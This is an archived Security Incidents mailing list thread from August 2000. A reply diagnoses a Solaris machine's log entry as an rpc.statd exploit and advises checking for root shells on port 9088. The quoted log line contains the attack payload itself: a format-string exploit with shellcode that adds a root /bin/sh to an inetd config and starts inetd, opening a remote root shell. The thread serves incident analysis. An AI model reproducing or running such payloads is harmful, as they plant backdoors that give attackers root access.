Security Incidents mailing list archives
Re: A statd exploit?
From: Andreas Östling <andreaso () it su se>
Date: Fri, 18 Aug 2000 11:19:04 +0200
Looks like rpc.statd exploit for Linux/x86. He should check for open root shells on port 9088 on all his machines. /Andreas Östling On Tue, 15 Aug 2000, Randy Nethers wrote:
Yesterday, a friend of mine from a local university asked me to take a look at a machine (an Ultra 2 w/Solaris 2.6) which had rebooted itself yesterday morning (Aug 14th) for no apparent reason. After poking around, I could find nothing of interest, except two things. First I found in /var/adm/messages.0 the following line: Aug 12 00:58:07 ultra2 statd[178]: statd: attempt to create "/var/statmon/sm/%0 8x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %0242x%n%055 x%n%012x%n%0192x%nK^v ^( ^ ^. #^1 F'F* FF+, NV1@/bin/sh -c echo "9088 stream tc p nowait root /bin/sh -i" >> /tmp/m; /usr/sbin/inetd /tmp/m;"
Current thread:
- A statd exploit? Randy Nethers (Aug 18)
- Re: A statd exploit? Andreas Östling (Aug 18)
- Re: A statd exploit? Ejovi Nuwere (Aug 18)